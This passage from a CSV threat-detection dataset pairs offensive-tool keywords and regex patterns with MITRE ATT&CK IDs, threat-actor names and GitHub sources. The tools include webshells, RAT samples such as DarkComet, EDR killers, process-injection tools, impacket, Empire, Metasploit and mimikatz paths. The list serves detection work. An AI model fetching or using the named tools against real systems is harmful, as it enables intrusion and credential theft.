T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - 
APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","6384" "*/Cyber Shell (v 1.0).php*",".{0,1000}\/Cyber\sShell\s\(v\s1\.0\)\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6385" "*/CyberSpy5.Asp*",".{0,1000}\/CyberSpy5\.Asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6386" "*/d00r_py3.py*",".{0,1000}\/d00r_py3\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6387" "*/D1rkInject.git*",".{0,1000}\/D1rkInject\.git.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","6388" "*/D3m0n1z3dShell.git*",".{0,1000}\/D3m0n1z3dShell\.git.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - 
T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6389" "*/D3m0n1z3dShell/archive/*",".{0,1000}\/D3m0n1z3dShell\/archive\/.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6390" "*/d4em0n/exrop*",".{0,1000}\/d4em0n\/exrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","6391" "*/daap-get-library.nse*",".{0,1000}\/daap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6392" "*/dacledit.py*",".{0,1000}\/dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6393" "*/dacledit.py*",".{0,1000}\/dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6394" "*/daclread.py*",".{0,1000}\/daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6395" "*/dafthack/MSOLSpray*",".{0,1000}\/dafthack\/MSOLSpray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","6396" "*/DAMP.git*",".{0,1000}\/DAMP\.git.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 
","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","6398" "*/Dandelion_RAT.exe*",".{0,1000}\/Dandelion_RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6399" "*/DanMcInerney/ridenum*",".{0,1000}\/DanMcInerney\/ridenum.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","6400" "*/daphne.git*",".{0,1000}\/daphne\.git.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","6401" "*/daphne-x64*",".{0,1000}\/daphne\-x64.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","6402" "*/Dark Comet Stub Crypter.exe*",".{0,1000}\/Dark\sComet\sStub\sCrypter\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - 
T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6403" "*/darkarmour.git*",".{0,1000}\/darkarmour\.git.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","6404" "*/DarkCoderSc.exe*",".{0,1000}\/DarkCoderSc\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6405" "*/DarkCoderSc/*",".{0,1000}\/DarkCoderSc\/.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","6406" "*/DarkComet.exe*",".{0,1000}\/DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 
","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6407" "*/DarkComet.exe*",".{0,1000}\/DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6408" "*/DarkComet_Full_setup.exe*",".{0,1000}\/DarkComet_Full_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6409" "*/DarkComet_Module_setup.exe*",".{0,1000}\/DarkComet_Module_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6410" "*/darkexe.py*",".{0,1000}\/darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","6411" "*/darkfire.bat*",".{0,1000}\/darkfire\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6412" "*/darkhotel.py*",".{0,1000}\/darkhotel\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6413" "*/DarkLoadLibrary.git*",".{0,1000}\/DarkLoadLibrary\.git.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","6414" "*/Darkside.exe*",".{0,1000}\/Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","6415" "*/Darkside.git*",".{0,1000}\/Darkside\.git.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense 
Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","6416" "*/Darkside.sln*",".{0,1000}\/Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","6417" "*/Dark-Virus.exe*",".{0,1000}\/Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6418" "*/Dark-Virus.exe*",".{0,1000}\/Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6419" "*/darkweb2017-top100.txt*",".{0,1000}\/darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6420" 
"*/DarkWidow.git*",".{0,1000}\/DarkWidow\.git.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","6421" "*/data/assemblies/SharpPick.exe*",".{0,1000}\/data\/assemblies\/SharpPick\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6422" "*/data/assemblies/SharpSendEmail.exe*",".{0,1000}\/data\/assemblies\/SharpSendEmail\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6423" "*/data/assemblies/SharpView.exe*",".{0,1000}\/data\/assemblies\/SharpView\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing 
engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6424" "*/data/attacks/*.txt*",".{0,1000}\/data\/attacks\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","6425" "*/data/auxiliary/gather*",".{0,1000}\/data\/auxiliary\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6426" "*/data/dll/mimikatz/mimikatz*",".{0,1000}\/data\/dll\/mimikatz\/mimikatz.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6427" "*/data/dll/PromptCreds/PromptCreds*",".{0,1000}\/data\/dll\/PromptCreds\/PromptCreds.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6428" "*/data/empire.db*",".{0,1000}\/data\/empire\.db.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - 
T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6429" "*/data/empire.orig.key*",".{0,1000}\/data\/empire\.orig\.key.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - 
T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6430" "*/data/exploits/*",".{0,1000}\/data\/exploits\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6431" "*/data/nxc.conf*",".{0,1000}\/data\/nxc\.conf.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6432" "*/data/payload.log*",".{0,1000}\/data\/payload\.log.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#linux","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6433" "*/data/shellcode*",".{0,1000}\/data\/shellcode.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
